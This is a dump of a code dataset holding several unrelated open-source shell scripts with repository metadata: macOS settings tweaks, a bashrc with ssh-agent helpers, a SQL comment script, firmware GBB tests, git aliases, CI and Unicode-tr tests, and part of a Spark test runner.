# (Bug fix) a duplicate `AutomaticDownload -bool` line was missing its value,
# which makes `defaults` abort with a usage error; AutomaticDownload is
# already set to false above, so the broken duplicate is simply removed.
# Hide the Catalina upgrade nag and clear the System Preferences badge.
sudo /usr/sbin/softwareupdate --ignore "macOS Catalina"
defaults write com.apple.systempreferences AttentionPrefBundleIDs 0
###############################################################################
# Security                                                                    #
###############################################################################
# Disable remote apple events
sudo systemsetup -setremoteappleevents off
# Disable remote login
sudo systemsetup -setremotelogin off
# Disable wake-on LAN
sudo systemsetup -setwakeonnetworkaccess off
# Do not show password hints
sudo defaults write /Library/Preferences/com.apple.loginwindow RetriesUntilHint -int 0
# Disable guest account login
sudo defaults write /Library/Preferences/com.apple.loginwindow GuestEnabled -bool false
# Disable the "Are you sure you want to open this application?" dialog
defaults write com.apple.LaunchServices LSQuarantine -bool false
# Require password immediately after sleep or screen saver begins
defaults write com.apple.screensaver askForPassword -int 1
defaults write com.apple.screensaver askForPasswordDelay -int 0
osascript -e 'tell application "System Events" to set require password to wake of security preferences to true'
###############################################################################
# Kill affected applications                                                  #
###############################################################################
# Restart every application whose preferences were touched above so that the
# new settings are picked up immediately (failures are ignored -- the app may
# simply not be running).
affected_apps=(
  "Activity Monitor"
  "cfprefsd"
  "Dock"
  "Finder"
  "Photos"
  "Safari"
  "SystemUIServer"
)
for app in "${affected_apps[@]}"; do
  killall "${app}" &> /dev/null
done
echo "Done. Note that some of these changes require a logout/restart to take effect."
| true
|
e8c4065d2ae53d5a663eb3b0bbf99811b30afbb9
|
Shell
|
leventyalcin/docker_build_scripts
|
/image_src/dev_basic/assets/home/.bashrc
|
UTF-8
| 1,154
| 4.125
| 4
|
[
"MIT"
] |
permissive
|
# Source every readable system-wide profile snippet.
# (Quotes added: an unreadable or oddly named snippet path must not word-split.)
for script in /etc/profile.d/*.sh ; do
  if [ -r "$script" ] ; then
    . "$script"
  fi
done

# Prefer the dedicated prompt snippets when present; otherwise fall back to a
# simple green-hostname / cyan-cwd prompt.
if [[ -r /etc/profile.d/bash_prompt.sh ]]; then
  . /etc/profile.d/bash_prompt.sh
elif [[ -r /etc/profile.d/color_prompt ]]; then
  . /etc/profile.d/color_prompt
else
  export PS1='\[\033[01;32m\]\h\[\033[01;36m\]\W$ \[\033[00m\]'
fi
# Print usage information for forwardSsh.
function forwardSsh_help() {
  printf '%s\n' \
    'usage: forwardSsh' \
    '... adds all of your .ssh keys to an ssh-agent for the current shell'
}
# Start a fresh ssh-agent for this shell and load every private key found in
# ~/.ssh (files matching id_* that are not .pub halves). Relies on the addKey
# helper defined below, which skips keys without a matching public key.
function forwardSsh() {
  echo "... generating agent for ssh forwarding in cluster"
  pkill ssh-agent
  eval "$(ssh-agent)"
  # Glob instead of parsing `ls` output (breaks on unusual filenames).
  local privateKey
  for privateKey in "$HOME"/.ssh/id_*; do
    [[ -e "$privateKey" ]] || continue      # pattern matched nothing
    [[ "$privateKey" == *.pub ]] && continue # skip public halves
    addKey "$privateKey"
  done
  ssh-add -l # verify your key has been added to the key-ring
}
# Print usage information for addKey.
function addKey_help() {
  printf '%s\n' \
    "usage: addKey </path/to/private_ssh_key>" \
    "... adds key to ssh-agent's keyring" \
    "e.g." \
    "addKey ~/.ssh/id_rsa"
}
# Add a single private key to the running ssh-agent, but only when its
# matching .pub file exists and is readable (ssh-add would otherwise prompt
# or fail). Prints a skip notice for keys without a public half.
function addKey() {
  local key="$1"
  if [[ -r "${key}.pub" ]]; then
    echo "... adding key $key"
    ssh-add "$key"
  else
    echo "... no public key found for $key. Will skip ..."
  fi
}
forwardSsh
| true
|
0362dd4a25701639931079fbf61dd852d51b3c01
|
Shell
|
mgijax/pgmgddbschema
|
/comments/MLD_Concordance_create.object
|
UTF-8
| 1,794
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/sh
# Attach PostgreSQL COMMENT metadata to the mgd.MLD_Concordance table and its
# columns. Changes into this script's own directory so ./Configuration
# resolves, then pipes the SQL through the shared doisql.csh wrapper
# (passing $0 so the wrapper can label its log output).
cd `dirname $0` && . ./Configuration
cat - <<EOSQL | ${PG_DBUTILS}/bin/doisql.csh $0
COMMENT ON TABLE mgd.MLD_Concordance IS 'Defines Concordance values for Hybrid Experiment. The Concordance table contains results for either Markers or Chromosomes. Concordance values are stored as integers which represent the number of Hybrid cells recording the presence/absence of a particular Marker/Chromosome in the Concordance table vs. the presence/absence of the Marker being tested for linkage: -/- (neither present), -/+ (linkage Marker present), +/- (Marker/Chromosome present), +/+ (both present).
Detail of MLD_Hybrid.';
COMMENT ON COLUMN MLD_Concordance.chromosome IS 'chromosome value; is NULL if _Marker_key is not NULL';
COMMENT ON COLUMN MLD_Concordance.cnn IS '-/-; number of Hybrid cells where neither the Concordance Marker/Chromosome nor the linkage Marker is present';
COMMENT ON COLUMN MLD_Concordance.cnp IS '-/+; number of Hybrid cells where the Concordance Marker/Chromosome is not present, but the linkage Marker is present';
COMMENT ON COLUMN MLD_Concordance.cpn IS '+/-; number of Hybrid cells where the Concordance Marker/Chromosome is present, but the linkage Marker is not present';
COMMENT ON COLUMN MLD_Concordance.cpp IS '+/+; number of Hybrid cells where both the Concordance Marker/Chromosome and the linkage Marker are present';
COMMENT ON COLUMN MLD_Concordance.creation_date IS 'date record was created';
COMMENT ON COLUMN MLD_Concordance._Expt_key IS 'foreign key to MLD_Expts';
COMMENT ON COLUMN MLD_Concordance._Marker_key IS 'foreign key to MRK_Marker';
COMMENT ON COLUMN MLD_Concordance.modification_date IS 'date record was last modified';
COMMENT ON COLUMN MLD_Concordance.sequenceNum IS 'sequence number for ordering records';
EOSQL
| true
|
753f9397d59a16ebf6bb93a3867c57f677d962be
|
Shell
|
coreboot/vboot
|
/tests/futility/test_gbb_utility.sh
|
UTF-8
| 9,054
| 3.296875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash -eux
# Copyright 2014 The ChromiumOS Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Exercises `futility gbb`: creating GBB blobs, getting/setting each property,
# and (further below) rejecting corrupted blobs.
#
# (Fix) shebang options are ignored when the script is invoked as
# `bash test_gbb_utility.sh`, so re-assert strict mode explicitly.
set -eux

me=${0##*/}
TMP="$me.tmp"

# Work in scratch directory
cd "$OUTDIR"

# Helper utility to modify binary blobs
REPLACE="${BUILD_RUN}/tests/futility/binary_editor"

# First, let's test the basic functionality

# For simplicity, we'll use the same size for all properties.
"${FUTILITY}" gbb -c 16,0x10,16,0x10 "${TMP}.blob"

# Flags
"${FUTILITY}" gbb -s --flags=0xdeadbeef "${TMP}.blob"
"${FUTILITY}" gbb -g --flags "${TMP}.blob" | grep -i 0xdeadbeef

# HWID length should include the terminating null - this is too long
if "${FUTILITY}" gbb -s --hwid="0123456789ABCDEF" "${TMP}.blob"; then
  false;
fi
# This works
"${FUTILITY}" gbb -s --hwid="0123456789ABCDE" "${TMP}.blob"
# Read it back?
"${FUTILITY}" gbb -g "${TMP}.blob" | grep "0123456789ABCDE"

# Same kind of tests for the other fields, but they need binary files.

# too long
dd if=/dev/urandom bs=17 count=1 of="${TMP}.data1.toolong"
dd if=/dev/urandom bs=17 count=1 of="${TMP}.data2.toolong"
if "${FUTILITY}" gbb -s --rootkey "${TMP}.data1.toolong" "${TMP}.blob";
  then false; fi
if "${FUTILITY}" gbb -s --recoverykey "${TMP}.data2.toolong" "${TMP}.blob";
  then false; fi

# shorter than max should be okay, though
dd if=/dev/urandom bs=10 count=1 of="${TMP}.data1.short"
dd if=/dev/urandom bs=10 count=1 of="${TMP}.data2.short"
"${FUTILITY}" gbb -s \
  --rootkey "${TMP}.data1.short" \
  --recoverykey "${TMP}.data2.short" "${TMP}.blob"
# read 'em back
"${FUTILITY}" gbb -g \
  --rootkey "${TMP}.read1" \
  --recoverykey "${TMP}.read2" "${TMP}.blob"
# Verify (but remember, it's short)
cmp -n 10 "${TMP}.data1.short" "${TMP}.read1"
cmp -n 10 "${TMP}.data2.short" "${TMP}.read2"

# Okay
dd if=/dev/urandom bs=16 count=1 of="${TMP}.data1"
dd if=/dev/urandom bs=16 count=1 of="${TMP}.data2"
dd if=/dev/urandom bs=16 count=1 of="${TMP}.data3"
"${FUTILITY}" gbb -s --rootkey "${TMP}.data1" "${TMP}.blob"
"${FUTILITY}" gbb -s --recoverykey "${TMP}.data2" "${TMP}.blob"
# Read 'em back.
"${FUTILITY}" gbb -g --rootkey "${TMP}.read1" "${TMP}.blob"
"${FUTILITY}" gbb -g --recoverykey "${TMP}.read2" "${TMP}.blob"
# Verify
cmp "${TMP}.data1" "${TMP}.read1"
cmp "${TMP}.data2" "${TMP}.read2"

# Basic get and set test using flashrom
# The implementation requires an FMAP so use a full firmware image
PEPPY_BIOS="${SCRIPT_DIR}/futility/data/bios_peppy_mp.bin"
cp "${PEPPY_BIOS}" "${TMP}.full.blob"
"${FUTILITY}" gbb -s --emulate="${TMP}.full.blob" --flags="0xdeadbeef"
"${FUTILITY}" gbb -g --emulate="${TMP}.full.blob" --flags | grep -i "0xdeadbeef"
# Okay, creating GBB blobs seems to work. Now let's make sure that corrupted
# blobs are rejected.
# Danger Will Robinson! We assume that ${TMP}.blob has this binary struct:
#
#   Field                 Offset  Value
#
#   signature:            0x0000  $GBB
#   major_version:        0x0004  0x0001
#   minor_version:        0x0006  0x0001
#   header_size:          0x0008  0x00000080
#   flags:                0x000c  0xdeadbeef
#   hwid_offset:          0x0010  0x00000080
#   hwid_size:            0x0014  0x00000010
#   rootkey_offset:       0x0018  0x00000090
#   rootkey_size:         0x001c  0x00000010
#   bmpfv_offset:         0x0020  0x000000a0
#   bmpfv_size:           0x0024  0x00000010
#   recovery_key_offset:  0x0028  0x000000b0
#   recovery_key_size:    0x002c  0x00000010
#   pad:                  0x0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
#                         0x0040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
#                         0x0050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
#                         0x0060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
#                         0x0070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
#   (HWID)                0x0080  30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 00
#   (rootkey)             0x0090  xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
#   (bmpfv)               0x00a0  xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
#   (recovery_key)        0x00b0  xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
#                         0x00c0  <EOF>
#
# Each case below patches one field with $REPLACE and expects futility to
# either accept (.ok) or reject (.bad) the resulting blob.
# bad major_version
"${REPLACE}" 0x4 2 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# header size too large
"${REPLACE}" 0x8 0x81 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# header size too small
"${REPLACE}" 0x8 0x7f < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# HWID not null-terminated is invalid (overwrite the trailing NUL at 0x8f)
"${REPLACE}" 0x8f 0x41 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# HWID of length zero is okay
"${REPLACE}" 0x14 0x00 < "${TMP}.blob" > "${TMP}.blob.ok"
"${FUTILITY}" gbb "${TMP}.blob.ok"
# And HWID of length 1 consisting only of '\0' is okay, too.
"${REPLACE}" 0x14 0x01 < "${TMP}.blob" | "${REPLACE}" 0x80 0x00 \
  > "${TMP}.blob.ok"
"${FUTILITY}" gbb "${TMP}.blob.ok"
# zero-length HWID not null-terminated is invalid
# NOTE(review): this repeats the 0x8f patch above verbatim; the comment
# suggests it was meant to also set hwid_size (offset 0x14) to 0 -- confirm.
"${REPLACE}" 0x8f 0x41 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# hwid_offset < GBB_HEADER_SIZE is invalid
"${REPLACE}" 0x10 0x7f < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
"${REPLACE}" 0x10 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# rootkey_offset < GBB_HEADER_SIZE is invalid
"${REPLACE}" 0x18 0x7f < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
"${REPLACE}" 0x18 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# recovery_key_offset < GBB_HEADER_SIZE is invalid
"${REPLACE}" 0x28 0x7f < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
"${REPLACE}" 0x28 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb "${TMP}.blob.bad"; then false; fi
# hwid: offset + size == end of file is okay; beyond is invalid
"${REPLACE}" 0x14 0x40 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g "${TMP}.blob.bad"
"${REPLACE}" 0x14 0x41 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb -g "${TMP}.blob.bad"; then false; fi
# rootkey: offset + size == end of file is okay; beyond is invalid
"${REPLACE}" 0x1c 0x30 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g "${TMP}.blob.bad"
"${REPLACE}" 0x1c 0x31 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb -g "${TMP}.blob.bad"; then false; fi
# recovery_key: offset + size == end of file is okay; beyond is invalid
"${REPLACE}" 0x2c 0x10 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g "${TMP}.blob.bad"
"${REPLACE}" 0x2c 0x11 < "${TMP}.blob" > "${TMP}.blob.bad"
if "${FUTILITY}" gbb -g "${TMP}.blob.bad"; then false; fi
# hwid_size == 0 doesn't complain, but can't be set
"${REPLACE}" 0x14 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g "${TMP}.blob.bad"
if "${FUTILITY}" gbb -s --hwid="A" "${TMP}.blob.bad"; then false; fi
# rootkey_size == 0 gives warning, gets nothing, can't be set
"${REPLACE}" 0x1c 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g --rootkey "${TMP}.read1" "${TMP}.blob.bad"
if "${FUTILITY}" gbb -s --rootkey "${TMP}.data1" "${TMP}.blob.bad";
  then false; fi
# recovery_key_size == 0 gives warning, gets nothing, can't be set
"${REPLACE}" 0x2c 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g --recoverykey "${TMP}.read2" "${TMP}.blob.bad"
if "${FUTILITY}" gbb -s --recoverykey "${TMP}.data2" "${TMP}.blob.bad";
  then false; fi
#
# hwid_digest: 0x0030 xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
# 0x0040 xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
# pad: 0x0050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# 0x0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# 0x0070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
# (HWID) 0x0080 30 31 32 33 34 35 36 37 38 39 41 42 43 44 45 00
# See that the digest is updated properly.
hwid="123456789ABCDEF"
"${FUTILITY}" gbb -s --hwid="${hwid}" "${TMP}.blob"
expect=$(echo -n "$hwid" | sha256sum | cut -d ' ' -f 1)
[ "$(echo -n "${expect}" | wc -c)" == "64" ]
"${FUTILITY}" gbb -g --digest "${TMP}.blob" | grep "${expect}"
# Garble the digest, see that it's noticed.
# (assuming these zeros aren't present)
"${REPLACE}" 0x33 0x00 0x00 0x00 0x00 0x00 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g --digest "${TMP}.blob.bad" | grep '0000000000'
"${FUTILITY}" gbb -g --digest "${TMP}.blob.bad" | grep 'invalid'
# Garble the HWID. The digest is unchanged, but now invalid.
"${REPLACE}" 0x84 0x70 0x71 0x72 < "${TMP}.blob" > "${TMP}.blob.bad"
"${FUTILITY}" gbb -g --digest "${TMP}.blob.bad" | grep 'invalid'
# cleanup
rm -f "${TMP}"*
exit 0
| true
|
af502111d9a5e16ff184e1c73cb6ddede69a45e1
|
Shell
|
ritcheyer/dotfiles
|
/git/aliases.zsh
|
UTF-8
| 1,185
| 2.984375
| 3
|
[
"MIT"
] |
permissive
|
# Use `hub` as our git wrapper:
# http://defunkt.github.com/hub/
hub_path=$(which hub)
if (( $+commands[hub] ))
then
alias git=$hub_path
fi
# The rest of my fun git aliases
alias glog="git log --graph --pretty=format:'%Cred%h%Creset %an: %s - %Creset %C(yellow)%d%Creset %Cgreen(%cr)%Creset' --abbrev-commit --date=relative"
alias gp='git push origin HEAD'
# Remove `+` and `-` from start of diff lines; just rely upon color.
alias gd='git diff --color | sed "s/^\([^-+ ]*\)[-+ ]/\\1/" | less -r'
alias g='git'
alias ga='git add'
alias gb='git branch'
alias gc='git commit'
alias gca='git commit -a'
alias gch='git checkout'
alias gcb='git checkout -b'
alias gco='git checkout'
alias gd='git diff | $EDITOR'
alias gl='git log'
alias gs='git status -sb'
alias push='git push'
alias pull='git pull'
alias merge='git merge'
alias such=git
alias very=git
alias wow='git status'
# Running the daily git commands
alias dailytask="gco master && pull && git fetch --prune"
alias deletelocal="git branch --merged | egrep -v \"(^\*|main|master|dev)\" | xargs git branch -d"
alias deleteremote="git push --delete origin"
alias gac='git add -A && git commit -m'
alias ge='git-edit-new'
| true
|
eedc121a7323fd808c27e4447b5fe769275f815b
|
Shell
|
julp/ugrep
|
/test/utr.sh
|
UTF-8
| 3,359
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
# charset: UTF-8
declare -r TESTDIR=$(dirname $(readlink -f "${BASH_SOURCE}"))
declare -r DATADIR="${TESTDIR}/data"
# Words of the form $'string' are treated specially. The word expands to string, with backslash-escaped characters
# replaced as specified by the ANSI C standard. Backslash escape sequences, if present, are decoded as follows:
# \a alert (bell)
# \b backspace
# \e
# \E an escape character
# \f form feed
# \n new line
# \r carriage return
# \t horizontal tab
# \v vertical tab
# \\ backslash
# \' single quote
# \" double quote
# \nnn the eight-bit character whose value is the octal value nnn (one to three digits)
# \xHH the eight-bit character whose value is the hexadecimal value HH (one or two hex digits)
# \cx a control-x character
#
# The expanded result is single-quoted, as if the dollar sign had not been present.
#
# A double-quoted string preceded by a dollar sign ($"string") will cause the string to be translated according to the cur‐
# rent locale. If the current locale is C or POSIX, the dollar sign is ignored. If the string is translated and replaced,
# the replacement is double-quoted.
. ${TESTDIR}/assert.sh.inc
declare -r INPUT="a${A}b${B}c${C}d${D}e${E}"
# Full case not "supported"
# declare -r LSFI=$'\xEF\xAC\x81' # FB01, Ll
# declare -r FI=$'\x66\x69' # F + I
assertOutputValue "tr 1 CU => 0" "./utr ${UGREP_OPTS} -d [abcde] ${INPUT} 2> /dev/null" "${A}${B}${C}${D}${E}"
assertOutputValue "tr 2 CU => 0" "./utr ${UGREP_OPTS} -d [${A}${B}${C}${D}${E}] ${INPUT} 2> /dev/null" "abcde"
assertOutputValue "tr 1 CU => 1" "./utr ${UGREP_OPTS} abcde 12345 ${INPUT} 2> /dev/null" "1${A}2${B}3${C}4${D}5${E}"
assertOutputValue "tr 2 CU => 1" "./utr ${UGREP_OPTS} ${A}${B}${C}${D}${E} 12345 ${INPUT} 2> /dev/null" "a1b2c3d4e5"
assertOutputValue "tr 1 CU => 2" "./utr ${UGREP_OPTS} abcde ${N1}${N2}${N3}${N4}${N5} ${INPUT} 2> /dev/null" "${N1}${A}${N2}${B}${N3}${C}${N4}${D}${N5}${E}"
assertOutputValue "tr 2 CU => 2" "./utr ${UGREP_OPTS} ${A}${B}${C}${D}${E} ${N1}${N2}${N3}${N4}${N5} ${INPUT} 2> /dev/null" "a${N1}b${N2}c${N3}d${N4}e${N5}"
assertOutputValue "tr eliminate by function" "./utr ${UGREP_OPTS} -d fn:isalpha ${A}${N1}${B}${N2}${C}${N3} 2> /dev/null" "${N1}${N2}${N3}"
assertOutputValue "tr eliminate by set" "./utr ${UGREP_OPTS} -d \"[\p{Lu}]\" ${A}${N1}${B}${N2}${C}${N3} 2> /dev/null" "${N1}${N2}${N3}"
assertOutputValue "tr function lower => upper (1/2 => 2 CU)" "./utr ${UGREP_OPTS} fn:islower fn:toupper ${N1}${DSLLI}${N2} 2> /dev/null" "${N1}${DCLLI}${N2}"
assertOutputValue "tr replace by one (2 CU)" "./utr ${UGREP_OPTS} ${N1}${C}${A}a${B} ${DCLLI} ${INPUT} 2> /dev/null" "${DCLLI}${DCLLI}b${DCLLI}c${DCLLI}d${D}e${E}"
assertOutputValue "tr grapheme deletion" "./utr ${UGREP_OPTS} --unit=grapheme --form=d -d ${E_ACUTE_NFD} ${E_ACUTE_NFD}${A_ACUTE_NFD} 2> /dev/null" "${A_ACUTE_NFD}"
assertOutputValue "tr grapheme replacement" "./utr ${UGREP_OPTS} --unit=grapheme --form=d ${E_ACUTE_NFD} X ${E_ACUTE_NFD}${A_ACUTE_NFD} 2> /dev/null" "X${A_ACUTE_NFD}"
exit $?
| true
|
f2fdeb5de49be7aa3c8d680292d3c6207199e3c1
|
Shell
|
cloudfoundry/metric-store-ci
|
/tasks/enable-disable-alert-failure/run.sh
|
UTF-8
| 747
| 3.328125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
. ./metric-store-ci/tasks/shared_bash
set -eoux pipefail
current_version=$(cat slack-rate-limit-version/version)
patch_version=$(patch_from_semver ${current_version})
alert_multiple=${alert_multiple:-5}
ignore_first=${ignore_first:-false}
if [[ ${patch_version} -gt 1 && $(( ${patch_version} % ${alert_multiple} )) -ne 0 ]]; then
echo "Not the first failure or a multiple of ${alert_multiple}, disable alert (failure #${patch_version})"
alert_disable
elif [[ ${patch_version} -eq 1 ]] && $ignore_first; then
echo "Ignore first failure, disable alert (failure #${patch_version})"
alert_disable
else
echo "First failure or a multiple of ${alert_multiple}, enable alert (failure #${patch_version})"
alert_enable
fi
| true
|
b6370cdaf93c3bcd5bad2a58c8e1bbf4a1f4c6cd
|
Shell
|
Nectolink/BashScript
|
/arry.sh
|
UTF-8
| 218
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
func()
{
#Filling Arry with loop
echo Lenth of Arry:-
read en
for((i=0; i<=$en; i++))
do
read a
arry[$i]=$a
done
}
func
#Arry In List Foreach
echo arry in list:-
for var in ${arry[*]}
do
echo $var
done
| true
|
32aede4576d0a59753b9aee1829013e4798ffcd9
|
Shell
|
ShubhamChaurasia/spark-rapids
|
/integration_tests/run_pyspark_from_build.sh
|
UTF-8
| 7,439
| 3.140625
| 3
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Copyright (c) 2020-2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -ex
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )"
cd "$SCRIPTPATH"
if [[ $( echo ${SKIP_TESTS} | tr [:upper:] [:lower:] ) == "true" ]];
then
echo "PYTHON INTEGRATION TESTS SKIPPED..."
elif [[ -z "$SPARK_HOME" ]];
then
>&2 echo "SPARK_HOME IS NOT SET CANNOT RUN PYTHON INTEGRATION TESTS..."
else
echo "WILL RUN TESTS WITH SPARK_HOME: ${SPARK_HOME}"
# support alternate local jars NOT building from the source code
if [ -d "$LOCAL_JAR_PATH" ]; then
CUDF_JARS=$(echo "$LOCAL_JAR_PATH"/cudf-*.jar)
PLUGIN_JARS=$(echo "$LOCAL_JAR_PATH"/rapids-4-spark_*.jar)
TEST_JARS=$(echo "$LOCAL_JAR_PATH"/rapids-4-spark-integration-tests*.jar)
UDF_EXAMPLE_JARS=$(echo "$LOCAL_JAR_PATH"/rapids-4-spark-udf-examples*.jar)
else
CUDF_JARS=$(echo "$SCRIPTPATH"/target/dependency/cudf-*.jar)
PLUGIN_JARS=$(echo "$SCRIPTPATH"/../dist/target/rapids-4-spark_*.jar)
TEST_JARS=$(echo "$SCRIPTPATH"/target/rapids-4-spark-integration-tests*.jar)
UDF_EXAMPLE_JARS=$(echo "$SCRIPTPATH"/../udf-examples/target/rapids-4-spark-udf-examples*.jar)
fi
ALL_JARS="$CUDF_JARS $PLUGIN_JARS $TEST_JARS $UDF_EXAMPLE_JARS"
echo "AND PLUGIN JARS: $ALL_JARS"
if [[ "${TEST}" != "" ]];
then
TEST_ARGS="-k $TEST"
fi
if [[ "${TEST_TAGS}" != "" ]];
then
TEST_TAGS="-m $TEST_TAGS"
fi
if [[ "${TEST_PARALLEL}" == "" ]];
then
# For now just assume that we are going to use the GPU on the
# system with the most free memory and then divide it up into chunks.
# We use free memory to try and avoid issues if the GPU also is working
# on graphics, which happens some times.
# We subtract one for the main controlling process that will still
# launch an application. It will not run thing on the GPU but it needs
# to still launch a spark application.
TEST_PARALLEL=`nvidia-smi --query-gpu=memory.free --format=csv,noheader | awk '{if (MAX < $1){ MAX = $1}} END {print int(MAX / (2.3 * 1024)) - 1}'`
echo "AUTO DETECTED PARALLELISM OF $TEST_PARALLEL"
fi
if python -c 'import findspark';
then
echo "FOUND findspark"
else
TEST_PARALLEL=0
echo "findspark not installed cannot run tests in parallel"
fi
if python -c 'import xdist.plugin';
then
echo "FOUND xdist"
else
TEST_PARALLEL=0
echo "xdist not installed cannot run tests in parallel"
fi
TEST_TYPE_PARAM=""
if [[ "${TEST_TYPE}" != "" ]];
then
TEST_TYPE_PARAM="--test_type $TEST_TYPE"
fi
if [[ ${TEST_PARALLEL} -lt 2 ]];
then
# With xdist 0 and 1 are the same parallelsm but
# 0 is more effecient
TEST_PARALLEL_OPTS=()
MEMORY_FRACTION='1'
else
MEMORY_FRACTION=`python -c "print(1/($TEST_PARALLEL + 1))"`
TEST_PARALLEL_OPTS=("-n" "$TEST_PARALLEL")
fi
RUN_DIR=${RUN_DIR-"$SCRIPTPATH"/target/run_dir}
mkdir -p "$RUN_DIR"
cd "$RUN_DIR"
## Under cloud environment, overwrite the '--rootdir' param to point to the working directory of each excutor
LOCAL_ROOTDIR=${LOCAL_ROOTDIR:-"$SCRIPTPATH"}
## Under cloud environment, overwrite the '--std_input_path' param to point to the distributed file path
INPUT_PATH=${INPUT_PATH:-"$SCRIPTPATH"}
RUN_TESTS_COMMAND=("$SCRIPTPATH"/runtests.py
--rootdir
"$LOCAL_ROOTDIR"
"$LOCAL_ROOTDIR"/src/main/python)
TEST_COMMON_OPTS=(-v
-rfExXs
"$TEST_TAGS"
--std_input_path="$INPUT_PATH"/src/test/resources
--color=yes
$TEST_TYPE_PARAM
"$TEST_ARGS"
$RUN_TEST_PARAMS
"$@")
NUM_LOCAL_EXECS=${NUM_LOCAL_EXECS:-0}
MB_PER_EXEC=${MB_PER_EXEC:-1024}
CORES_PER_EXEC=${CORES_PER_EXEC:-1}
# Spark 3.1.1 includes https://github.com/apache/spark/pull/31540
# which helps with spurious task failures as observed in our tests. If you are running
# Spark versions before 3.1.1, this sets the spark.max.taskFailures to 4 to allow for
# more lineant configuration, else it will set them to 1 as spurious task failures are not expected
# for Spark 3.1.1+
VERSION_STRING=`$SPARK_HOME/bin/pyspark --version 2>&1|grep -v Scala|awk '/version\ [0-9.]+/{print $NF}'`
[[ -z $VERSION_STRING ]] && { echo "Unable to detect the Spark version at $SPARK_HOME"; exit 1; }
echo "Detected Spark version $VERSION_STRING"
SPARK_TASK_MAXFAILURES=1
[[ "$VERSION_STRING" < "3.1.1" ]] && SPARK_TASK_MAXFAILURES=4
export PYSP_TEST_spark_driver_extraClassPath="${ALL_JARS// /:}"
export PYSP_TEST_spark_executor_extraClassPath="${ALL_JARS// /:}"
export PYSP_TEST_spark_driver_extraJavaOptions="-ea -Duser.timezone=UTC $COVERAGE_SUBMIT_FLAGS"
export PYSP_TEST_spark_executor_extraJavaOptions='-ea -Duser.timezone=UTC'
export PYSP_TEST_spark_ui_showConsoleProgress='false'
export PYSP_TEST_spark_sql_session_timeZone='UTC'
export PYSP_TEST_spark_sql_shuffle_partitions='12'
# prevent cluster shape to change
export PYSP_TEST_spark_dynamicAllocation_enabled='false'
# Set spark.task.maxFailures for most schedulers.
#
# Local (non-cluster) mode is the exception and does not work with `spark.task.maxFailures`.
# It requires two arguments to the master specification "local[N, K]" where
# N is the number of threads, and K is the maxFailures (otherwise this is hardcoded to 1,
# see https://issues.apache.org/jira/browse/SPARK-2083).
export PYSP_TEST_spark_task_maxFailures="$SPARK_TASK_MAXFAILURES"
if ((NUM_LOCAL_EXECS > 0)); then
export PYSP_TEST_spark_master="local-cluster[$NUM_LOCAL_EXECS,$CORES_PER_EXEC,$MB_PER_EXEC]"
else
# If a master is not specified, use "local[*, $SPARK_TASK_MAXFAILURES]"
